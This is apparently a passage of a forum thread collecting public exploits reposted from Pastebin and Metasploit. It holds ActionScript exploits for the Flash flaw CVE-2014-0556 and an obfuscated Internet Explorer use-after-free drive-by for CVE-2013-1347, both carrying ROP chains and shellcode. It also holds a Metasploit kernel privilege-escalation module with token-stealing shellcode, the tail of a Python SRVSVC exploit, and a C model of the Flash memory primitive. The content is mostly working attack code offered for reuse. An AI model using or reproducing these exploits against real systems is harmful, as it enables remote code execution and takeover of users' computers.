    print '\nUsage: %s <target ip> \n' % sys.argv[0]
    sys.exit(-1)

    current = SRVSVC_Exploit(target)
    current.start()
```

Note: this crappy syntax highlighter throws in random spaces. Get it from the source.

Source: [Python] CVE-2012-0002 - Pastebin.com
  19. [h=1]CVE-2014-0556[/h]
By: hdarwin on Sep 27th, 2014 (edited)

```actionscript
/*
<html>
<head>
<title>CVE-2014-0556</title>
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/

/*
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020
eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
4141411c ??              ???
*/

package
{
    import flash.events.*
    import flash.media.*
    import flash.display.*
    import flash.geom.*
    import flash.utils.*
    import flash.text.*
    import flash.system.Capabilities;
    import flash.external.ExternalInterface

    public class Main extends Sprite
    {
        private var i0:uint
        private var i1:uint
        private var i2:uint
        private var i3:uint
        private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version)
        private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
        private var ob:Vector.<Object> = new Vector.<Object>(6400)
        private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
        private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
        private var snd:Sound
        private var vector:uint

        public function Main():void
        {
            for (i0 = 0; i0 < 3200; i0++) {
                ba[i0] = new ByteArray()
                ba[i0].length = 0x2000
                ba[i0].position = 0xfffff000
            }

            for (i0 = 0; i0 < 3200; i0++) {
                if (i0 % 2 == 0) ba[i0] = null
                ob[i0 * 2] = new Vector.<uint>(1008)
                ob[i0 * 2 + 1] = new Vector.<uint>(1008)
            }

            bitmap.copyPixelsToByteArray(rect, ba[1601])

            for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break

            ob[i0][1024 * 3 - 2] = 0xffffffff

            for (i1 = 0; ; i1++) {
                if (i0 == i1) continue
                if (ob[i1].length != 1008) break
            }

            ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
            ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
            ob[i0].fixed = true

            for (i2 = 1000; ; i2++) {
                if (
                    ob[i1][0xFFFFFFFF - i2 + 0] == 0 &&
                    ob[i1][0xFFFFFFFF - i2 + 10] == 1 &&
                    ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]
                ) {
                    vector = ob[i1][0xFFFFFFFF - i2 + 11]
                    str += "\n\nVector<uint> Address : " + vector.toString(16)
                    break
                } else if (
                    ob[i1][i2 + 0] == 0 &&
                    ob[i1][i2 + 10] == 1 &&
                    ob[i1][i2 + 5] == ob[i1][i2 + 15]
                ) {
                    vector = ob[i1][i2 + 11]
                    str += "\n\nVector<uint> Address : " + vector.toString(16)
                    break
                }
            }

            snd = new Sound()

            for (i2 = 0; i2 < 6400; i2++) {
                if (i2 == i0 || i2 == i1) continue
                ob[i2] = null
                ob[i2] = new Vector.<Object>(1014)
                ob[i2][0] = snd
                ob[i2][1] = snd
            }

            for (i2 = 0; ; i2++) {
                if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) {
                    str += "\n\nDump Vector<Object>"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t"
                    }

                    str += "\n\nDump Sound Object"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t"
                    }

                    str += "\n\nDump Sound Object V-Table"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t"
                    }

                    str += "\n\n*** V-Table Modify ***"
                    write(ob[i0][i2 + 1] - 1, vector + 8)
                    for (i3 = 0; i3 < 1008; i3++) {
                        ob[i0][i3] = 0x41414100 | i3
                    }

                    str += "\n\nDump Sound Object"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t"
                    }

                    str += "\n\nDump Sound Object V-Table"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t"
                    }
                    break
                }
            }

            ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
            ob[i0][1024 * 3 - 2] = 0

            var tf:TextField = new TextField();
            tf.width = 800;
            tf.height = 800;
            tf.text = str;
            addChild(tf)

            if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
        }

        private function write(addr:uint, data:uint):void
        {
            ob[i0][(addr - vector) / 4 - 2] = data
        }

        private function read(addr:uint):uint
        {
            return ob[i0][(addr - vector) / 4 - 2]
        }

        private function zeroPad(number:String, width:int):String
        {
            if (number.length < width) return "0" + zeroPad(number, width-1)
            return number
        }

        public function exploit():void
        {
            snd.toString()
        }
    }
}
```

=============================================================================================================================

```actionscript
/*
<html>
<head>
<title>CVE-2014-0556</title>
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/

/*
(1728.eb0): Break instruction exception - code 80000003 (first chance)
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63048 cc              int     3
1:020> dd esp l4
08d63048  cccccccc cccccccc cccccccc cccccccc
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63049 cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304a cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304b cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304c cc              int     3
*/

package
{
    import flash.events.*
    import flash.media.*
    import flash.display.*
    import flash.geom.*
    import flash.utils.*
    import flash.text.*
    import flash.external.ExternalInterface

    public class Main extends Sprite
    {
        private var i0:uint
        private var i1:uint
        private var i2:uint
        private var i3:uint
        private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
        private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
        private var ob:Vector.<Object> = new Vector.<Object>(6400)
        private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
        private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
        private var snd:Sound
        private var vector:uint
        private var vtable:uint
        private var flash:uint

        public function Main():void
        {
            for (i0 = 0; i0 < 3200; i0++) {
                ba[i0] = new ByteArray()
                ba[i0].length = 0x2000
                ba[i0].position = 0xfffff000
            }

            for (i0 = 0; i0 < 3200; i0++) {
                if (i0 % 2 == 0) ba[i0] = null
                ob[i0 * 2] = new Vector.<uint>(1008)
                ob[i0 * 2 + 1] = new Vector.<uint>(1008)
            }

            bitmap.copyPixelsToByteArray(rect, ba[1601])

            for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break

            ob[i0][1024 * 3 - 2] = 0xffffffff

            for (i1 = 0; ; i1++) {
                if (i0 == i1) continue
                if (ob[i1].length != 1008) break
            }

            ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
            ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
            ob[i0].fixed = true

            for (i2 = 1000; ; i2++) {
                if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
                    vector = ob[i1][0xFFFFFFFF - i2 + 11]
                    break
                } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
                    vector = ob[i1][i2 + 11]
                    break
                }
            }

            snd = new Sound()

            for (i2 = 0; i2 < 6400; i2++) {
                if (i2 == i0 || i2 == i1) continue
```
ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) 
/ 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } [/LIST] Sursa: [ActionScript 3] CVE-2014-0556 - Pastebin.com
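Both listings above rest on a single primitive: an out-of-bounds ByteArray write clobbers the length field of a neighbouring Vector.<uint>, after which that vector reads and writes any 32-bit address through the index formula `(addr - vector) / 4 - 2`. The C program below is an added model of that primitive written for this page; it is not Flash Player code and not hdarwin's code. The 8-byte vector header, the size of the model address space, the fake object at 0x1000 and the placement of `vec_a` directly in front of the ByteArray buffer are assumptions chosen to mirror the exploit's layout, and the real copyPixelsToByteArray bug is only approximated by an unchecked, wrapping write at `position`.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed 32-bit "address space": an address is a byte offset into mem[].
 * All pointer arithmetic below is done in uint32_t so it wraps exactly like
 * the 32-bit Flash Player build the exploit targets. */
#define MEM_SIZE   0x2000u
#define VEC_LEN    16u                 /* elements per Vector.<uint> (1008 in the exploit) */
#define VEC_BYTES  (8u + VEC_LEN * 4u) /* assumed layout: [length][unused] then elements */

static uint8_t mem[MEM_SIZE];

static int mem_rd(uint32_t addr, uint32_t *out) {
    if (addr > MEM_SIZE - 4u) return 0;           /* model page fault */
    memcpy(out, mem + addr, 4);
    return 1;
}
static int mem_wr(uint32_t addr, uint32_t val) {
    if (addr > MEM_SIZE - 4u) return 0;
    memcpy(mem + addr, &val, 4);
    return 1;
}

/* Vector.<uint> element access as the VM checks it: only `index < length`
 * is verified, then the element address is base + 8 + index*4 (wrapping). */
static int vec_get(uint32_t base, uint32_t idx, uint32_t *out) {
    uint32_t len;
    if (!mem_rd(base, &len) || idx >= len) return 0;   /* RangeError in AS3 */
    return mem_rd(base + 8u + idx * 4u, out);
}
static int vec_set(uint32_t base, uint32_t idx, uint32_t val) {
    uint32_t len;
    if (!mem_rd(base, &len) || idx >= len) return 0;
    return mem_wr(base + 8u + idx * 4u, val);
}

/* The bug class as modelled here: a ByteArray write at `position` that is never
 * checked against the buffer length, so buf + position wraps to an address
 * *before* the buffer (the exploit sets position = 0xfffff000). */
static void bytearray_oob_fill(uint32_t buf, uint32_t position, uint32_t n, uint8_t byte) {
    uint32_t dst = buf + position;                    /* wraps in 32-bit */
    for (uint32_t i = 0; i < n; i++)
        if (dst + i < MEM_SIZE) mem[dst + i] = byte;
}

/* Constructed layout (assumption): vec_a sits immediately before the ByteArray
 * buffer, where the exploit's freed-ByteArray hole puts it; vec_b is further on. */
static const uint32_t vec_a  = 0x400u;
static const uint32_t ba_buf = 0x400u + VEC_BYTES;
static const uint32_t vec_b  = 0x400u + VEC_BYTES + 0x100u;
static const uint32_t obj    = 0x1000u;           /* fake object: first dword is its v-table pointer */

static void vec_init(uint32_t base) {
    mem_wr(base, VEC_LEN);
    mem_wr(base + 4u, 0);
    for (uint32_t i = 0; i < VEC_LEN; i++) mem_wr(base + 8u + i * 4u, 0x11110000u | i);
}

/* Arbitrary read/write through vec_b with the exploit's own index formula
 * ob[i0][(addr - vector) / 4 - 2]: for addr below the vector the subtraction
 * wraps to a huge index, which the corrupted length of 0xffffffff accepts. */
static uint32_t read32(uint32_t addr) {
    uint32_t v = 0;
    vec_get(vec_b, (addr - vec_b) / 4u - 2u, &v);
    return v;
}
static int write32(uint32_t addr, uint32_t val) {
    return vec_set(vec_b, (addr - vec_b) / 4u - 2u, val);
}

/* Runs the exploit's three setup steps; returns 1 once the primitive works. */
static int build_primitive(void) {
    memset(mem, 0, sizeof mem);
    vec_init(vec_a);
    vec_init(vec_b);
    mem_wr(obj, 0x0BADF00Du);                         /* original "v-table" pointer */

    if (vec_set(vec_a, VEC_LEN, 1)) return 0;         /* sanity: bounds check still enforced */

    /* 1. the OOB ByteArray write sprays 0xff over vec_a, length field included */
    bytearray_oob_fill(ba_buf, 0u - VEC_BYTES, VEC_BYTES, 0xff);

    /* 2. vec_a now indexes anywhere: set vec_b's length to 0xffffffff,
     *    mirroring ob[i0][1024 * 3 - 2] = 0xffffffff */
    if (!vec_set(vec_a, (vec_b - vec_a - 8u) / 4u, 0xffffffffu)) return 0;

    /* 3. vec_b is now a read/write primitive over the whole 32-bit space */
    return read32(vec_b) == 0xffffffffu;
}

int main(void) {
    if (!build_primitive()) { puts("primitive not established"); return 1; }
    printf("obj v-table before: %08x\n", read32(obj));
    write32(obj, vec_b + 8u);    /* redirect it into controlled data, as write(..., vector + 8) does */
    printf("obj v-table after : %08x\n", read32(obj));
    return 0;
}
```

Compile with `cc -std=c99 model.c`. The program establishes the primitive and then overwrites the fake object's first dword the way `write(ob[i0][i2 + 1] - 1, vector + 8)` redirects the Sound's v-table in the listing. The one step the model leaves out is the address scan (the `for (i2 = 1000; ; i2++)` search for a vector header), because here the vector's address is simply known.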
20. MSIE Use After Free EXP/CVE-2013-1347 (http://pastebin.com/JN2GiB8n)

<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
pRESSURA = eval('unescape');
fAHPARIC = CollectGarbage;
dISCESA = '%u';

// dword (as 8 hex chars) -> two %u escapes, little-endian
function rIGUARDI(rEPLACEMENT) {
    return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4));
}

// dword -> zero-padded 8-char hex string
function vILMENTE(tRIPARTITO) {
    rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10));
    if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI;
    mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10));
    if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI;
    tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10));
    if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE;
    pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10));
    if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO;
    return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO;
}

function ue(dw) {
    return rIGUARDI(vILMENTE(dw));
}

// cookie marker so a victim is only hit once
function setc() {
    var Then = new Date()
    Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3)
    document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString()
}

function readc() {
    var cookieString = new String(document.cookie);
    if (cookieString.indexOf("fucktheothers") == -1) {
        return 0
    } else {
        return 1;
    }
}

// PUSHAD-based VirtualProtect ROP chain built on msvcrt.dll / shell32.dll / user32.dll
function DropPayload() {
    // en = 77c10000
    // kr = 77bc0000
    // offset = 50000
    var r = "";
    r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll]
    r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll]
    r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll]
    r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201)
    for(i=0;i<=0x201;i++) {
        r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll]
    }
    r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll]
    r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx)
    r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
    r+= ue( 0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll]
    r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll]
    r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll]
    r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll]
    r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll]
    r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll]
    r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll]
    r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll]
    r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll]
    r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll]
    r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll]
    return r;
}

function align_esp() {
    var r= "";
    r += ue(0x77BFD801);
    return r;
}

function xchg_esp() {
    var r="";
    r += ue(0x77BC5ED5);
    return r;
}

function helloWorld() {
    if (readc()) return;
    setc();
    unicorn = unescape("ABCD");
    unicorn2 = unescape("EEEE");
    for (i=0; i < 2; i++) {
        unicorn += unescape("ABCD");
    }
    unicorn += unescape("AB");
    unicorn += DropPayload();
    // xor-encoded (key 0x19) shellcode with its decoder stub; \u8989 == encoded NOP
    unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919";
    // stack pivot padding, the last slot being the xchg into the chain
    animvalues = align_esp();
    for (i=0; i < 0x70/4; i++) {
        if (i == 0x70/4-1) {
            animvalues += xchg_esp();
        } else {
            animvalues += align_esp();
        }
    }
    animvalues += unicorn;
    for(i = 0; i < 13; i++) {
        animvalues += ";red";
    }
    // DOM manipulation that frees the object, then the animation values reuse it
    f0 = document.createElement('span');
    document.body.appendChild(f0);
    f1 = document.createElement('span');
    document.body.appendChild(f1);
    f2 = document.createElement('span');
    document.body.appendChild(f2);
    document.body.contentEditable="true";
    f2.appendChild(document.createElement('datalist'));
    f1.appendChild(document.createElement('span'));
    f1.appendChild(document.createElement('table'));
    try{
        f0.offsetParent=null;
    }catch(e) {
    }
    f2.innerHTML="";
    f0.appendChild(document.createElement('hr'));
    f1.innerHTML="";
    fAHPARIC();
    try {
        a = document.getElementById('myanim');
        a.values = animvalues;
    } catch(e) {}
}
</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>
</body>
</html>

@PhysicalDrive0

Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com
21. [h=1]Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation[/h]

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description'    => %q{
        A vulnerability within Microsoft Bluetooth Personal Area Networking module,
        BthPan.sys, can allow an attacker to inject memory controlled by the attacker
        into an arbitrary location. This can be used by an attacker to overwrite
        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
        NtQueryIntervalProfile.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>'   # MSF module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Targets'        =>
        [
          ['Windows XP SP3',
            {
              'HaliQuerySystemInfo' => 0x16bba,
              '_KPROCESS' => "\x44",
              '_TOKEN'    => "\xc8",
              '_UPID'     => "\x84",
              '_APLINKS'  => "\x88"
            }
          ]
        ],
      'References'     =>
        [
          [ 'CVE', '2014-4971' ],
          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
          [ 'OSVDB', '109387' ]
        ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget'  => 0
    ))
  end

  # Token-stealing kernel stager (XP SP3 x86 offsets): walk ActiveProcessLinks
  # from the current EPROCESS to PID 4, take its Token, then walk again to the
  # meterpreter PID and store the token there.
  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"   # pushad; mov eax, fs:[0x124]  (KTHREAD)
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"      # mov eax,[eax+0x44]; push eax; mov ebx,4
    tokenswap << "\x00\x00\x00\x8B\x80\x88"      # mov eax,[eax+0x88]  (ActiveProcessLinks.Flink)
    tokenswap << "\x00\x00\x00\x2D\x88"          # sub eax,0x88
    tokenswap << "\x00\x00\x00\x39\x98\x84"      # cmp [eax+0x84],ebx  (UniqueProcessId)
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8" # jne loop; mov edi,[eax+0xc8]  (Token)
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"  # and edi,0xfffffff8; pop eax; mov ebx,<pid>
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"      # mov eax,[eax+0x88]
    tokenswap << "\x2D\x88\x00\x00\x00"          # sub eax,0x88
    tokenswap << "\x39\x98\x84\x00\x00\x00"      # cmp [eax+0x84],ebx
    tokenswap << "\x75\xED\x89\xB8\xC8"          # jne loop; mov [eax+0xc8],edi
    tokenswap << "\x00\x00\x00\x61\xC3"          # popad; ret
  end

  def fill_memory(proc, address, length, content)
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)
    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

    return address
  end

  def disclose_addresses(t)
    addresses = {}

    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")

